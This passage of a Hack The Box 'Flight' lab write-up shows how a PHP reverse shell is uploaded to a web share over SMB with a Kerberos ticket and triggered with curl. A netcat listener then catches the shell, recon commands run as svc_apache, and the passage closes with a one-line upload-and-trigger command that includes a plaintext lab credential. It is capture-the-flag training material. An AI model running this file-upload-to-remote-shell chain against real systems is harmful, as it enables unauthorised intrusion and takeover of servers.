File Upload / RCE
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ KRB5CCNAME=c.bum@g0.flight.htb.ccache impacket-smbclient flight.htb/@g0.flight.htb -no-pass -k -target-ip $IP -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# use Web
# cd school.flight.htb
# put shell.phpUploading the payload containing a PHP reverse shell
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ curl -s http://school.flight.htb/shell.phpInvoking the payload via curl
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.187] 51322
socket: Shell has connected! PID: 1388
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\xampp\htdocs\school.flight.htb> whoami
flight\svc_apache
c:\xampp\htdocs\school.flight.htb> hostname
g0
c:\xampp\htdocs\school.flight.htb> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::23d
ipv6 address. . . . . . . . . . . : dead:beef::b1d9:efc7:61e1:4d02
link-local ipv6 address . . . . . : fe80::b1d9:efc7:61e1:4d02%6
ipv4 address. . . . . . . . . . . : 10.10.11.187
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%6
10.10.10.2
c:\xampp\htdocs\school.flight.htb>powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
ps c:\xampp\htdocs\school.flight.htb> Initial Foothold established to the target system as the svc_apache account with the security context of a service account via file upload to RCE
$ smbclient //g0.flight.htb/web -u 'flight.htb\c.bum%tikkycoll_431012284' -c 'prompt false ; cd school.flight.htb ; put shell.php' ; curl -s http://school.flight.htb/shell.phpOneliner due to a scheduled task in the background resetting the connection